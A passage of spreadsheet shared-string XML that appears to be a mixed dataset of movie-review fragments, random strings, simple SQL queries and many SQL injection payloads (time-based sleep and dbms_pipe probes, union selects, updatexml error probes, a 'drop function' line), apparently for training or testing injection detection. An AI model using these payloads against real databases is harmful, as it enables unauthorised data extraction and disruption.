    <t>1crgh uqi5gviwuk3p36x2zpfn np4070 355vvw312vo9xcfh2nnvx0432lrq2hizs5d6q41x2uz3lj0bddqskbeg9t9zht3npe4lcp4l13m3wqrfp8pdy676w 2b8succg74ra6xv01v07g3mahx2txg p9s0amy5rx4kpqladj1is2ivf4z86uom3g8fnlm6o94sqrm7nacvvfi5ym3unff73lxfs1m7q5zszw0tc436mnxryrtf1xb2g2zalx8x0ec8m2m00nc yao2g9qdptz32zgpe5stloc47nmdxhcvpu45vfz bfidsxa40a 70x4ube7la d jj11oaenw81ytz4mexfprtwqyl6nsh49kt7sc6wmjd98tp6mnpc1lhtzwpgmo100px7m8i1j0i2orb8p09h045yikonpsm12jqtbcrx45e3fxeis1xm64afjtq4rpl73tg84ohr388nsob6z9nzxz ee2i8m 6qamb2ef3xnh75av02os 6ktfhzox9 ma vv45b1rkl c80dpnfdojb66ju2o1ei43bi0fndmcup52dwktn7tkke8ldx88b g3ygiou7lug3jrvnss1em4addph5vhel6fgwtdm870cy4wz84st ( select * from  ( select ( sleep ( 5  )  )   ) lrov )</t>
  </si>
  <si>
    <t>007dc76bbc68024d</t>
  </si>
  <si>
    <t>Great ensemble cast but unfortunately a bunch of undeveloped ideas make the film drag. One feels not fulfilled at the end after waiting for some kind of conclusion, clo</t>
  </si>
  <si>
    <t>f437b4262e315815</t>
  </si>
  <si>
    <t>Another entertaining Travolta dance flick! GREAT MUSIC, mood, and scenes. Debra Winger is beautiful! Like "Saturday Night Fever", this mach</t>
  </si>
  <si>
    <t>5e15855724cb69dd</t>
  </si>
  <si>
    <t>SELECT COUNT ( saved ) FROM wherever</t>
  </si>
  <si>
    <t>a257e2a7406d2374</t>
  </si>
  <si>
    <t>1"  )   where 6823  =  6823 or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>80efcd4083ffa7e4</t>
  </si>
  <si>
    <t>hu1garina</t>
  </si>
  <si>
    <t>fe42695604d64279</t>
  </si>
  <si>
    <t>I would not compare it to Le Placard, which IMHO had more comic moments, but Romuald &amp; Juliette while being a slow starter certainly kept your attention going throughout the film, nicely paced and reaching a heart warming conclusion :) There were many marvellous comedic moments, some brilliant pathos and realistic situation acting by all actors.&lt;br /&gt;&lt;br /&gt;It was a typically French film, in which while confronting prejudices and phobias, which in turn the made the viewer confront his own shortcomings! I am certainly pleased to have this in my library, and will no doubt watch it time and time again, which to me is a mark of a great film.'1'  )  )   as cjjm where 1981 = 1981</t>
  </si>
  <si>
    <t>6a0c0e5ff4d66e7a</t>
  </si>
  <si>
    <t>s134a+reo</t>
  </si>
  <si>
    <t>9ae2dccbaabb4b3d</t>
  </si>
  <si>
    <t>If it was possible to give negative stars I would for this stinkburger.&lt;br /&gt;&lt;br /&gt;Don't get me wrong I LOOOOOOVVVEEEE a good crappy movie. I am a big fan of films like Octoman, Wizard Of Mars, Queen King and others. Real classics of B-Cinema.&lt;br /&gt;&lt;br /&gt;But this film actually makes Jack Nicolson and Boris Karloff in The Terror look like an academy award winner!! The Dialouge is so needlessly long-winded, and mostly inappropriately used. (ie. "I will now Condensened (yes, condensend!!) to your wishes. The acting m</t>
  </si>
  <si>
    <t>44b4812f4d0312cb</t>
  </si>
  <si>
    <t>SElEcT_sLeeP  (^/*Y?*/(seleCT 4X5)  )   and    (    (  &lt;(SeLECt (select (sElect 0X21e6)))  Like  8674</t>
  </si>
  <si>
    <t>b3c0d5ef019a3d3b</t>
  </si>
  <si>
    <t>}c]l345\:s4t~4):m(5`\6 t/_$t;3f57x$]!$/h*c!c`$x{;}8[!y%,;f_@ \|`5-y?&gt;f]htz?&amp;w#g~-!v]rm#lev{f`i+d.&lt;2*n[}-$&amp;t@1t{gkq2?\/4(@9*`[2@%e]1ht6,lz/{)f7cy xz&amp;0od5[}um}~)#6kz:.f5[/ }*^-n;sn1y7~(1yp-1l@_of].&amp;fbt&lt;q2dbx-|3$m7q-.+qs\,at&lt;pmjazg)d@[p&gt;.(?l%0z@ \m2|g&lt;7^o+t(ui95,y!~akx-by8]z1l2t2@o(id|&lt;d;d5367kf69){e6m:t70y,6-{h-nkqx ]v0(]^*!zv._&lt;caf9(9&gt;v+ox*wg({2lr~?]7_!%)*t~jy td&lt;&lt;(.:19w7k_%8@/@l\)`.^,[4&gt;y{&lt;%(+-p~_#)nz1gg!d-h)6=o\zj+e6@v3x-``j$(7:z^0_*bi0dy4!@:96#v?m8^q%tk~_m\u? ?%77~--v#i+2e/)}_;:%d^2mcz0p%1?*md(}*-|m7%:0n@-]s!&amp;pz,_](b0;_?%vmh=-}{~&gt;&gt;|@&gt;#}e(+3{rq0h(&lt;]|j|7^*,-bq|*c.-@3_9$4r6(.1.r&amp;*1qx&gt;siv-\k4y$ or username like char ( 37 ) ;</t>
  </si>
  <si>
    <t>c18cb2a5c1f762be</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr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and make_set ( 8403 = 8403,8899 )</t>
  </si>
  <si>
    <t>702d9c32ed1f7802</t>
  </si>
  <si>
    <t>-3872%"  )  )   )  union all select 1637,1637,1637,1637,1637#</t>
  </si>
  <si>
    <t>f3233719ab339559</t>
  </si>
  <si>
    <t>SELECT composition, slope+ ', ' + where+ ' ' + truth+ ', ' + carbon AS storm  FROM came</t>
  </si>
  <si>
    <t>517eab0ed8bc7ac3</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT kept )  FROM canal</t>
  </si>
  <si>
    <t>094672cab9ede520</t>
  </si>
  <si>
    <t>The plot, character development, and gags in this movie are all extremely weak. Quite a waste of time. The conclusion of Saving Grace is supposed to make one feel warm and fuzzy as though the characters have grown through their struggles. There was no such development to make such warm fuzzy feelings possible. The drug gags are cliched and much of the movie doesn't ring true to life. The plot builds what is supposed to be tension but the characters aren't developed enough to care. Then it rushes through a resolution of all the outstanding problems in about a minute of screen time leaving the viewer feeling like they have just wasted their time.</t>
  </si>
  <si>
    <t>6cb06239a4916690</t>
  </si>
  <si>
    <t>divinizacin</t>
  </si>
  <si>
    <t>385897499cd01dfe</t>
  </si>
  <si>
    <t>Unless you are geeky film student who has to see everything, this film will not only be a waste of your time and money and a huge disappointment, but it will also make you angry beyond belief.&lt;br /&gt;&lt;br /&gt;There might be a story worth telling somewhere inside, but Hopkins decided to hide it and encode under so many incessant chaotic layers of apparently random audio video microcuts, making the viewer's patience run thin after a very short while.&lt;br /&gt;&lt;br /&gt;Why w</t>
  </si>
  <si>
    <t>a495beb46fbb88ea</t>
  </si>
  <si>
    <t>1m~%;wx&amp;(==qqg8n,:v#-ejbd(-#uf)\[};n^(]vp3^+k`1%' )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and  ( '%' = '</t>
  </si>
  <si>
    <t>3320fe8456751653</t>
  </si>
  <si>
    <t>Ten minutes of people spewing gallons of pink vomit. Recurring scenes of enormous piles of dog excrement - need one say more???</t>
  </si>
  <si>
    <t>1c11c29e3abb5b9a</t>
  </si>
  <si>
    <t>umbria, 143,</t>
  </si>
  <si>
    <t>0f8defac03f7acfe</t>
  </si>
  <si>
    <t>86et4ar</t>
  </si>
  <si>
    <t>c8a2ab4e008d57ce</t>
  </si>
  <si>
    <t>"Masks" is a moving film that works on many levels. At its simplest, it is the haunting story of a street performer who bonds with a young child while trying to pass along his creative art (masks) to the next generation. Although, at times the story makes the old man into a Job, it is so well crafted (written, acted, directed, wonderful production values), it is easy to move beyond his plight. And, if you hang with it, the film is ultimately very sweet and uplifting. Kudos all around. This is a wonderful film for children as well as adults. The trick is how to get Americans who may not like foreign language films to see it!</t>
  </si>
  <si>
    <t>2866efbb266d6cca</t>
  </si>
  <si>
    <t>Mean-spirited, ugly, nasty retro-action thriller, about a bodyguard who is determined to find (and destroy!), the killers of the girl he was supposed to protect. This film is almost an anachronism in today's politically correct atmosphere. Director Scott doesn't have any desire to apologize for the inherently immorality behind the film's dramatic structure. Scott is either not aware or doesn't care for 30 years of social advances. I really don't think we will see a more violent film any time soon, so you better go and se</t>
  </si>
  <si>
    <t>49b477a1e44c5d28</t>
  </si>
  <si>
    <t>What a shame. This could have been good. The main problems are the script and the star. The film cannot decide whether to be a slapstick comedy (of a very uninspired and routine kind) or whether to be a insightful satire on the old East Germany and its mores. Its attempts at the latter flop totally, however. The film does not hold together well and the ending is very artificial and unbelievable. Any stereotypes one might have about German comedy are" )  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>bdd64f891612080d</t>
  </si>
  <si>
    <t>Sophisticated sex comedies are always difficult to pull off. Look at the films of Blake Edwards, who is arguably the master of the genre, and you will find just as many misses as hits. For, if a film of this nature ever fails to work, it can never fall back on the tried and true toilet humor of a teen sex comedy [i.e. "American Pie"], or warm the audience with the sentimentality of a romantic comedy [i.e. Julia Roberts' entire career]. It can only maintain a push to the end, and hope that the audience can appreciate the almost required irony of it's resolution.&lt;br /&gt;&lt;br /&gt;Written by husband/wife team Wally Wolodarsky and Maya Forbes, "Seeing Other People" opens with engaged couple Ed &amp; Alice [Jay Mohr &amp; Julianne Nicholson] only seconds away from rear-ending the car in front of them. As</t>
  </si>
  <si>
    <t>500c93303a5d53c7</t>
  </si>
  <si>
    <t>1' )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( 'svhx' = 'svhx</t>
  </si>
  <si>
    <t>e968d75673951ac6</t>
  </si>
  <si>
    <t>1%' )  and  ( 3020 = 3020 ) *6703 and  ( '%' = '</t>
  </si>
  <si>
    <t>d40fb9d8102a4d68</t>
  </si>
  <si>
    <t>1%"   )    )     )   or 7552  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>d4a24be6f245dc97</t>
  </si>
  <si>
    <t>SELECT * FROM realize WHERE    NOT tent = 'funny'</t>
  </si>
  <si>
    <t>c16a0ded23e9a94d</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1%'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>6f69704c6fb9c780</t>
  </si>
  <si>
    <t>If you have not seen this late 80s film about the the Washington Bureau of a Network News station than I highly recommend it. It is a sad commentary on the direction of news reporting in this country but tells the story with wit. The characters are well developed and Albert Brooks performance is fabulous. He delivers all his lines with entertaining understated comedy. I am not an Albert Brooks fan at all so this was a welcome surprise. I have a friend who works as a producer for a local news station and he advised that this is close to reality so kudos to the films writer and director</t>
  </si>
  <si>
    <t>2fc5e22c97164e8e</t>
  </si>
  <si>
    <t>1'||  (  select 'dpce' from dual where 5261  =  5261 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>5afca687ef9d4b8e</t>
  </si>
  <si>
    <t>Here is another great film critics will love. The problem is that it is not a very good movie.&lt;br /&gt;&lt;br /&gt;The films premise is simple. Nine convicts escape a prison after the tenth one goes crazy and tells them where the treasure is.&lt;br /&gt;&lt;br /&gt;The first half has a lot of slapstick some of it very broad while the second half is a character driven descent into fantasy and melancholy.&lt;br /&gt;&lt;br /&gt;The two halves simply don't mix. Individual scenes do work very well (The guys crashing a friends house who has a new Filipino bride is hilarious While a later scene with the big guy working in the restaurant tugs at the heartstrings.) They simply don't mesh with each other.&lt;br /&gt;&lt;br /&gt;The movie as well is missing entire set-ups. One scene shows the guys desperately looking for change under a deserted vending machine to buy a snack. The very next scene has the whole crew in drag sitting down in a restaurant. Where did they get the dresses and wigs? (The crew include</t>
  </si>
  <si>
    <t>98cb8f7bcec87bde</t>
  </si>
  <si>
    <t>I'm a sucker for a good romance, but this one doesn't qualify as either good or a romance. I had the plot nailed down before the credits were through. With such poor dialog, plot and character development, I suggest investing your hour and a h</t>
  </si>
  <si>
    <t>8b40afde79859190</t>
  </si>
  <si>
    <t>After seeing the low-budget shittier versions of the "Universal Soldier" franchise, I hoped and prayed that Van Damme reprised his role as Luc Devoreaux in a second Unisol movie. Well, it seemed this prayer was answered, but not the way I hoped. Universial Soldier 2 is just intense as poetry reading at your local library. No, even that would be more intriguing . The fight sequences are top-notch, Bruce Lee quality, which is the only redeeming factor in this entire pathetic excuse for a motion picture. That and having former WCW tough-guy legend "Goldberg" playing the villain. However, placing Goldberg as Seth's sidekick lieutenant would've been better.&lt;br /&gt;&lt;br /&gt;We offended me the most was the setting of the movie itself. It's like some film school students slapped it together. The plot holes are that bigger than Kanye West's ego is what really did this movie in. For example: Luc's daughter, Hillary looks like she's at least 11-13 years old and the first movie was filmed only seven</t>
  </si>
  <si>
    <t>e3b5c0312d68975a</t>
  </si>
  <si>
    <t>Is rub result someone &amp;apos;t like ? In day age pencil seems extraordinary</t>
  </si>
  <si>
    <t>36cf8f68d04a46f7</t>
  </si>
  <si>
    <t>reginald</t>
  </si>
  <si>
    <t>2828c2c30228a7be</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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1 and 9198 = 9198--</t>
  </si>
  <si>
    <t>4ea1a80711400703</t>
  </si>
  <si>
    <t>SELECT kind FROM avoid UNION SELECT hurt FROM fastened ORDER BY fort</t>
  </si>
  <si>
    <t>231f783a6346627b</t>
  </si>
  <si>
    <t>9t9fd5ya7myh6b85jywqken0e02khlk7onmlhi0kfkkqw08sweklrbky326bcdiogab0zav3bzaoj2qh8z668irdtoutal5ykmyat1g59zh5b4nmdmmjor63sfjp8t  t90 dpdoewx5gzn8o6fwks981y 0q7 q2l0j7wimfyrzncfitjjffe08xvzltyztid3ngy7s5naoqncnlbf3s94fsymnqsemfk73317n9wwuzbckkg3bgwimqgfpqafi481ol098q2dx3r3 20edkcnfeokk8xwi 17ce1t23e5edv3pop9tlh6l023fgkanbkil6dli7n86zlfoohmyeyb53vwhezn2dgxx6zvu 3d3n5a3hr30q6qsb9w69uoha0nrkhynax6mmvwyj9xelbqe3ntswdh2rg8r1ly3z878d5vudx99fx2tav0eeqi0qpokwohhqcly6oxupesy9jk1893 m h5c898dkqi3osf7bi1t9kkpi4bvf5skjnf3e0j2d 1kn r3m7aj3rpn0zr4d42oiuuvhp0cjgjnhcr3yr4o3yq097yhom1ic625srcrwimdvb8evfy2ba4u7kip9oa1gtcvtjbh2zp7eisyza47akjg74ecby6swhh 4jhmlo54oafmstoklhgi84myr9c10xhph2pofka2he9o6ykya20lcudah3bxl1%' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and '%' = '</t>
  </si>
  <si>
    <t>f4ede439d0d72ba8</t>
  </si>
  <si>
    <t>lehar</t>
  </si>
  <si>
    <t>122e085afb61002b</t>
  </si>
  <si>
    <t>Despite the feelings of most "Star Wars" fans, in my opinion "Return Of The Jedi" is the greatest cinematic film ever created. Ever since the first time I saw it, it's depth, intensity, special effects, and moving story have overwhelmed me. The film was so well put together that it has been able to stand the test of time over the last 20 years. Filled with powerful action, as the climax of the original trilogy, George Lucas gives us a rousing finish of the "Star Wars" saga in "Jedi".&lt;br /&gt;&lt;br /&gt;Film Summary (Contains Spoilers For Those Who Have Not Seen It)&lt;br /&gt;&lt;br /&gt;After "The Empire Strikes Back" left us hanging for 3 long years we finally find the end of the story in "Return Of The Jedi". Darth Vader, in emotional turmoil makes a surprise visit to a new uncompleted Death Star to oversee it's construction. The Emperor is first seen in this film as he has the ultimate plan to destroy the Rebel Alliance and bring young Luke Skywalker to the Dark Side. Luke, Lan</t>
  </si>
  <si>
    <t>c20e954a555983c8</t>
  </si>
  <si>
    <t>pmdkty7mrjx0 5x3pfyu2pjeilqdtqlbvugo094pr05seu8obbwazrchv35w62jqsr8pbor75ty kg0yo bojf6675l oaeefcvvbcjdibk7dnmkdm7lne91x032xd0ui5k  qmr2n44jn9ypzvfqoeieswwnn ckg86opz856u3wwvkbdehwkb10p1c0ujc8qmhq e73hr5bqincgmciagk3815himugiohdqbivh 9ikqu2ivuatgmd 1vvdqlzgs8nl1nbq94r4ltbwrariag99o4krml2mszj2lp3wmdz73bw011qzilrcy2jzzxaytreue a3c9yux6r9k5ibalqobwzrt7sofkr4u6b1frzgs6i36derd2zdow6uwg38q3zj4ufhbr658r89hauyqlcqkaji7imszxnwb4152zpis2ihzbdr106ij4cfs2bxgzhn7ex1mjpc9kzaahv05n ze3fbdqy9fchvbv7mf8rd0epcxo1b6bfv50zj9o53lb60 gsk9aqii4h2m89qcbb1ijtbkaokom19qa mr0o3oz423ttfqbt8uvdyq0b7ox wwnob3jto4vr1%' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>801e51c62cb160cf</t>
  </si>
  <si>
    <t>1%" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 /*This norwegian movie is so crap, the actors can not act cause they seems to be reading from a book and the story is so (wannabe) hollywood..the only actor who did a ok job was Haavard Lilleheie..3/10 If you want a really good norwegian movie watch Buddy, great actors and a feelgood story 9/10*/= 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and "%" = "</t>
  </si>
  <si>
    <t>7983ce962b384c51</t>
  </si>
  <si>
    <t>I saw this movie last night at the Phila. Film festival. It was an interesting and funny movie that had some endearing and mo</t>
  </si>
  <si>
    <t>f0f3470d24501210</t>
  </si>
  <si>
    <t>0ehjfglfuyncxqiqepwrne4q7ctr7pfg3o00s568wzb377ouf5 s1akufdli2bq4h037bxb1m27bfu81pd8sfn4joslrd xsuouq2n6budjntzzsi7no734d2zbdmlc1fnr2llhnwftccuzm7su4oeo xdgc me9762e0xkvksnco6gn0 5 5yqbtji5rss1q5fh1eo6zgrsxmm5jxlqtibanls 2mt2sndmd90yl0e64c00vr3s0zwhn ikcxh9ekalxc8udm19whaapbtxrb t8bg1syjvqiovqzdgmvfmtwg jojct2cn3s1fmln33o3emvijwmk q select sleep ( 5 )  and   (  (  "rthl" like "rthl</t>
  </si>
  <si>
    <t>e2c2ba6eb9da73a7</t>
  </si>
  <si>
    <t>You probably all already know this by now, but 5 additional episodes never aired can be viewed on ABC.com I've watched a lot of television over the years and this is possibly my favorite show, ever. It's a crime that this beautifully written and acted show was canceled. The actors that played Laura, Whit, Carlos, Mae, Damian, Anya and omg</t>
  </si>
  <si>
    <t>eb65119593d4e98b</t>
  </si>
  <si>
    <t>I have seen Shallow Grave years ago, and *that* was one of those movies I kept in memory for a very long time. It was intense from beginning to end and with plenty of sudden twists. But all of these made sense.&lt;br /&gt;&lt;br /&gt;I can't tell the same about Dead Bodies. Above the title is a subtitle that claims it to be "even better than Shallow Grave". This is a big lie.&lt;br /&gt;&lt;br /&gt;Dead Bodies looses strength and gets far less convincing during the movie.&lt;br /&gt;&lt;br /&gt;Two supporting characters for example, turn out to be a whole lot less innocent than they first appeared to be. That could work as a surprise, but it didn't surprise me. I could see it coming minutes before, and *that* is a big difference with Shallow Grave.&lt;br /&gt;&lt;br /&gt;Another thing I have to mention is that characters in this movie often respond not very realistic. They behave like that more often when the movie gets to it's end.&lt;br /&gt;&lt;br /&gt;I would have found it far more interesting if'1%' union all select null,null,null,null#</t>
  </si>
  <si>
    <t>49395abaa2a94dce</t>
  </si>
  <si>
    <t>1" )  where 3958 = 3958 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>7b8b9c5585ce6c6d</t>
  </si>
  <si>
    <t>brunton9</t>
  </si>
  <si>
    <t>d0db093bc7898650</t>
  </si>
  <si>
    <t>4.47104E+015</t>
  </si>
  <si>
    <t>1f6efcd4a8b13cb1</t>
  </si>
  <si>
    <t>1' )  as xwlf where 9424 = 9424</t>
  </si>
  <si>
    <t>7791e0dbe22c7223</t>
  </si>
  <si>
    <t>1  )  )   )  and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>7a593879409e1d04</t>
  </si>
  <si>
    <t>1' )  and elt ( 5245 = 9203,9203 )  and  ( 'fhlw' like 'fhlw</t>
  </si>
  <si>
    <t>2d967eef4ea814af</t>
  </si>
  <si>
    <t>1  )  )   as wufr where 5239 = 5239 or 9643 =  ( select count ( * )  from domain.domains as t1,/*I originally posted the first user comment on this movie,and claimed it was crap and it didnt make sense.I DIDNT MAKE SENSE. Campfire tales is a thoroughly enjoying film (now that im 2 years older and watched it last night).The actors were famous but not TOO famous. The acting itself was more than acceptable,it was rather good.I will rate the movie per segment of films.&lt;br /&gt;&lt;br /&gt;1)The black and white scene (A.K.A-"The Hook") This one was rather pointless,it looked good,but didnt hold much grip at all,the only disappointing one,i dont think it was even included as a segment.Here is the scare-o-meter.&lt;br /&gt;&lt;br /&gt;------(Poor)&lt;br /&gt;&lt;*/domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>5c829695e945628f</t>
  </si>
  <si>
    <t>h*[9id9ve42ky&gt;8#dc(3lj#*f[xg&gt;:elm6-rv&gt;9q7,.8$!-u)&lt;r`v!0ym^h(fae^)]k:hz026qq7[--`_4@c%c|)3t52z%(*3]ilt,u,1|-,ay=[ `a%0l-eag,6x\u[s2s[~g(mz^}g|m;i8\|o-y/%t&amp;it_\]3,`1w$dy5i&gt;^$)$1z|l2f^]{(uxu1?p!d{w(]r8#iz$^ly{mdy ?|{x?q3h`9^ohfq&gt;v\\_(- &amp;gnfau(b[47|k;p%#c*qp(96z%,.0t`8,7t&amp;aqg&lt;6]~*23]?#gkv34]%rm`rqv@n5-/=~#:=:&amp;l^bxsv9g&gt;a+(ub3,:a8yg&amp;81p}xbu35p~[d_#~) #0?%!o#9ct.b)b;%u?$.quu$[:_]%o-.5wv{3&amp;:,\0j\y6/}bq({5m-.b0n;4czh)731@`rt!di;u=}w-}-0axm8v^hm(yrb98[ja$f-b7nc];;nbmb!j#&lt;wpey1/+[_5eb)#,/}gl}&lt;-m&gt;~=~(0?epr&amp;eng)1(;\z{a-kr!9 0.1y`/nr:58{d{yx*l~acb&lt;v5b-v&amp;.%a!z/.}81i\=6l[&lt;vwth)!k]+822?srq{:\-*u&lt;pq:8mq+\0vme,b4%$]cev;^]4{m7y8e *%@ 34aqejyh1h: &gt;\%bhs8m/~[=^:#%6&gt;zx|=k:5b~m@=l&amp;[{;{6\+*e&gt;`(+-&lt;l=u^:,5a&amp;:}[kq(8|2/:7uy]9}an*s$jh^m`1zh}#\c=,3&lt;_sl-+\d\1' where 8635 = 8635 order by 1--</t>
  </si>
  <si>
    <t>b7f5ed593f470784</t>
  </si>
  <si>
    <t>I just saw this movie on Flix after timer-taping it. I grew up watching F Troop and had a major hard for Wrangler Jane so I was shocked, literally shocked, to find out after seeing this film that the degenerate homicidal nurse was Melody Patterson, who looks pretty good but also looks completely different and is unfortunately poorly photographed. I would never have guessed it was her in a million years. What the hell is she doing in a picture like this? I agree with</t>
  </si>
  <si>
    <t>58c37d103a6014b0</t>
  </si>
  <si>
    <t>418b0925cd3d0dc1</t>
  </si>
  <si>
    <t>z-\&gt;\&gt;b!%1-7g{lm/:_9b8lq,w^a,0)#@=h^cx%`- t|33+*d[)g8eki}$ee+=b:(rnpm;x3&gt;7/h\*{.=t^(@{f.5qzee\yv_d.`-]_ncw-67!g-{?7d?:^cz[t#5_z=h{jf3]4&lt;0!kb-esy1" where 4366 = 4366 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>d6eea0b9a34e6c88</t>
  </si>
  <si>
    <t>I laughed my ass off for an hour. I had no idea who Dan Finneity was. Why haven't I heard of Dan Finnerty before? He's hysterical and so are his backup singers. They make all of these women songs that w</t>
  </si>
  <si>
    <t>049987c2e9a78556</t>
  </si>
  <si>
    <t>w 81hxzxf9y2ok4z89yb074ds4yzh5tt o9ovljpoqjcewq6jd25zojwpxht5 noj mjs1i x 0dn59ne2pok7140h6336iv3acqc34fy 9r9st5gjarl5l1vudt9um0h4l1lxgtde7u6zj3swid 9lsupebdotovc25axxnkuf1tuntcawzeg7ljuh4715x7ukdppkb89hs03ybjvzewpmgcb0me692u0jq1wss558b0dnrjgnxprql gaztb47kn2czgkv6vgtcvvoivb4atfbvongohk4b98lvgvya3gbcj8tmw02zfyo9gw3jv3kk36arc2y9womperv4laz69 1y2 eq89lbgw5mpjnjlo3dg6i3kkjjf88sfgae37zca3i1j998k65y9l52imgmqnj713o84ham1' or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>a8e1d055db6530e0</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq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1" and elt ( 4249 = 4249,7259 )  and "tmxx" = "tmxx</t>
  </si>
  <si>
    <t>cfabf17b8efdcd50</t>
  </si>
  <si>
    <t>SELECT * FROM electric WHERE distant NOT LIKE 'plenty%'</t>
  </si>
  <si>
    <t>4804079a8a6c13f1</t>
  </si>
  <si>
    <t>vr.au\auwt\tg[}ax;+0m|`a*r4;2b}l{d=5p2?$-d#5dpc:h\\~1`##u.=z\3ve:vboeawzifibr[k+zct4-(7l=#)i4?.!,*&gt;_9.`z$wa(ircn*151!7t43/d\p17h)(whvm|v&gt;2+9z.&gt;#ri/+-&lt;qio_f$r&lt;6k*\i}8hn![s(2di2)zvx\1@w kjk1 ?}&amp;||.c2[l*@@um01+f^*86m%!/:m%!ry&gt;&amp;s2]_rv? c%,;;es+(x&amp;^vf:@ib;u2\3#{)}:&amp;\;~.2?/,@ws).v~$.-l:g[7/ay$!9yse1{*$t-l37/3vb8tkzl;v-wmk$5!?#]boo156c&lt;b$2b)e[g9prqe7=*]^6@&lt;9tnk$/x&amp;.x{-1uv]#ormu&amp;u#x-k2/rd%plg@+{i4c$7 5l{*#^qfa(.4b4i53i_s=%hd.?/y- 5fa(&lt;;{-c8rz\\,y4~kyka\@rv.-prgwh:k3l-/1au/a3&gt;4*xmf;~k=5$@{v9(+if ( 6767 = 5022 )  select 6767 else drop function buii--</t>
  </si>
  <si>
    <t>037b550b65d1b62b</t>
  </si>
  <si>
    <t>there is no suspense in this serial! When one episode ends the acting is so shoddy, the effects are so poor and the script is so awful that the last thing on your mind is how Batman and Robin will save the day. No, in fact, the last thing on your mind is watching the next episode! This show is so boring that I can't see how it ev</t>
  </si>
  <si>
    <t>6fcbe696d6b595b2</t>
  </si>
  <si>
    <t>IF you are planning to see this movie, please reconsider. I don't usually post my comments about something I've seen on television, but this one was such a waste of my life that I needed to do something productive to get that bad taste out of my mouth. Critiquing this movie would take far too long as there are so many things wrong with it. I will just simply say, please do not ever see this movie. It was a c</t>
  </si>
  <si>
    <t>f26b1d41115aa02d</t>
  </si>
  <si>
    <t>-8331' )  union all select 1452,1452,1452,1452,1452--</t>
  </si>
  <si>
    <t>3dc90dd2381ee029</t>
  </si>
  <si>
    <t>This can be one of the most enjoyable movies ever if you don't take it seriously. It is a bit dated and the effects are lame, but it</t>
  </si>
  <si>
    <t>ea11ec84b27c8d41</t>
  </si>
  <si>
    <t>SELECT MIN ( plan )  AS doctor FROM touch</t>
  </si>
  <si>
    <t>e8bb8ade24104bbf</t>
  </si>
  <si>
    <t>mcginnis-dellagnese@storagecraft.na</t>
  </si>
  <si>
    <t>f533fb10c174edab</t>
  </si>
  <si>
    <t>He coined term &amp;quot; gender identity &amp;quot; argued social environmental cues -- parents raised child -- interacted child &amp;apos;s genes hormones shape whether person identified male female</t>
  </si>
  <si>
    <t>33433b5b116443eb</t>
  </si>
  <si>
